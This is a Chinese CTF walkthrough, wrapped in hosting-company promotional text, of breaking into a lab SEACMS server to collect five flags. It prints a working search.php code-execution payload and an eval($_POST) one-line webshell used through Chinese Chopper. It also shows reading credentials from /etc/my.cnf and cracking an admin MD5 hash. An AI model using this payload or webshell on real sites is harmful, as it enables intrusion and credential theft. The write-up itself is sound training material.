這篇文章主要介紹“CTF主機(jī)滲透實(shí)戰(zhàn)分析”的相關(guān)知識(shí),小編通過實(shí)際案例向大家展示操作過程,操作方法簡(jiǎn)單快捷,實(shí)用性強(qiáng),希望這篇“CTF主機(jī)滲透實(shí)戰(zhàn)分析”文章能幫助大家解決問題。
創(chuàng)新互聯(lián)建站長(zhǎng)期為超過千家客戶提供的網(wǎng)站建設(shè)服務(wù),團(tuán)隊(duì)從業(yè)經(jīng)驗(yàn)10年,關(guān)注不同地域、不同群體,并針對(duì)不同對(duì)象提供差異化的產(chǎn)品和服務(wù);打造開放共贏平臺(tái),與合作伙伴共同營(yíng)造健康的互聯(lián)網(wǎng)生態(tài)環(huán)境。為瀘溪企業(yè)提供專業(yè)的成都網(wǎng)站建設(shè)、成都做網(wǎng)站,瀘溪網(wǎng)站改版等技術(shù)服務(wù)。擁有十載豐富建站經(jīng)驗(yàn)和眾多成功案例,為您定制開發(fā)。
實(shí)戰(zhàn)此題如下:
此道題一共需要拿到5個(gè)flag,從哪里入手呢?
第一步:首先我們打開連接地址:http://202.0.0.206
第二步:漏洞分析
根據(jù)分析,此道題是一個(gè)SEACMS的平臺(tái)系統(tǒng)
該版本通過其他論壇平臺(tái)了解到存在一個(gè)代碼執(zhí)行漏洞。Exp:/search.php?searchtype=5&tid=&area=phpinfo()。我們來試試此漏洞能夠利用,直接在后面的phpinfo()就可以執(zhí)行任意php代碼直接訪問http:// 202.0.0.206/search.php?searchtype=5&tid=&area=phpinfo()發(fā)現(xiàn)phpinfo()執(zhí)行成功了,說明該漏洞存在。
我們嘗試看看源碼中有沒有flag,右鍵打開此頁面的源碼,在源碼果然有一個(gè)flag= flag1{ac727d1a3130e4093b3665120a3240a5}
第三步:一句話木馬利用
接下來我們利用一句話木馬來利用。
使用使用exp:/search.php?searchtype=5&tid=&area=eval($_POST[simple])構(gòu)造一句話小馬。
打開工具菜刀,在地址欄中填寫
http://202.0.0.206/search.php?searchtype=5&tid=&area=eval($_POST[simple]),密碼為simple,點(diǎn)擊添加
連接成功了,如下:
第四步:胡亂搗騰
接下來就是耗時(shí)的去找了,如小偷進(jìn)家,沒有目的只能胡亂的翻了!
費(fèi)時(shí)很久在 /home目錄下發(fā)現(xiàn)有key文件,打開文件,獲得flag2=
flag2{6634eaf4ce34a82da12d835c1ed86a24}
在 /etc目錄下的my.cnf關(guān)于數(shù)據(jù)庫(kù)MySQL的配置文件。發(fā)現(xiàn)flag3和數(shù)據(jù)庫(kù)相關(guān)賬戶信息。flag3{da04113d21f02f0ebfd281d0a7a64e34},并且得到了數(shù)據(jù)庫(kù)的密碼。
第五步:數(shù)據(jù)庫(kù)操作
在上一步獲取到關(guān)于數(shù)據(jù)庫(kù)的用戶名和密碼,使用用戶名和密碼,重新配置菜刀,連接數(shù)據(jù)庫(kù)。
提交打開數(shù)據(jù)庫(kù),在seacms中的flag表中,找到一個(gè)flag= flag4{32730c5cc0bd7bb8ffde4457649fd409}
分別在數(shù)據(jù)庫(kù)中查詢seacms的后臺(tái)的賬號(hào)密碼
SELECT `name` FROM `sea_admin`
SELECT `password` FROM `sea_admin`
第六步:密碼破解
取到的密碼是MD5加密,密碼為:23a7bbd73250516f069d 百度MD5在線解密,發(fā)現(xiàn)該加密值是20位,使用了和dedecms一樣的加密方式,將該加密值的前三位和最后一位去掉,就是16位的MD5加密,在線解密結(jié)果是admin123。
第六步:找后臺(tái)登錄頁面
接下來找到網(wǎng)站的后臺(tái)登錄頁面,我們這里使用DirBuster工具。
使用在數(shù)據(jù)庫(kù)中已經(jīng)獲得的用用戶名和密碼,登錄網(wǎng)站后臺(tái)密碼是admin123。
好了,登錄成功,我們拿到了后臺(tái)登錄頁面,并可以使用管理員賬號(hào)登錄。
第七步:胡亂搗騰
在后臺(tái)逛了半天,終于在網(wǎng)站后臺(tái)查找計(jì)劃任務(wù)時(shí),發(fā)現(xiàn)key5。
flag5{f01cbadfd0daee0d65c2502a38581558}
最后,到此為止,5個(gè)flag全部找出來了,接下來我們把5個(gè)flag放入答題框。
關(guān)于“CTF主機(jī)滲透實(shí)戰(zhàn)分析”的內(nèi)容就介紹到這里了,感謝大家的閱讀。如果想了解更多行業(yè)相關(guān)的知識(shí),可以關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道,小編每天都會(huì)為大家更新不同的知識(shí)點(diǎn)。